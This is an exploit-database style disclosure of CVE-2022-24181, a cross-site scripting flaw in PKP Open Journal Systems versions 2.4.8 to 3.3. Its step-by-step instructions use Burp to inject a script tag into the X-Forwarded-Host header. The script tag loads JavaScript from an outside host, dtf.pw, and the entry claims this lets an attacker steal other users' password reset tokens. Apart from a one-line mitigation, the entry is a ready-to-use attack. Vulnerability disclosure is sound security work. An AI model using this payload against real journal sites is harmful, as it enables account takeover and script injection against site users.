# Exploit Title: PKP Open Journals System 3.3 - Cross-Site Scripting (XSS)
# Date: 31/01/2022
# Exploit Author: Hemant Kashyap
# Vendor Homepage: https://github.com/pkp/pkp-lib/issues/7649
# Version: PKP Open Journals System 2.4.8 >= 3.3
# Tested on: All OS
# CVE : CVE-2022-24181
# References: https://youtu.be/v8-9evO2oVg
XSS via Host Header injection and Steal Password Reset Token of another user Step to reproduce:
1) Go to this site: https://who's-using-ojs-software.com
2) And capture this request in burp , and send to repeater.
3) Add this after Host Header X-Forwarded-Host: foo"><script src=//dtf.pw/2.js></script><x=".com
4) And this click on send , after this right click on request and click on show response in browser , after this copy the request.
5) Paste this request in browser , and you'll see xss pop-up. Mitigation: Update to newer version.
This vulnerability in PKP vendor software Open-journal-system version 2.4.8 to 3.3.8 all are vulnerable to xss via Host Header injection and steal password reset token vulnerability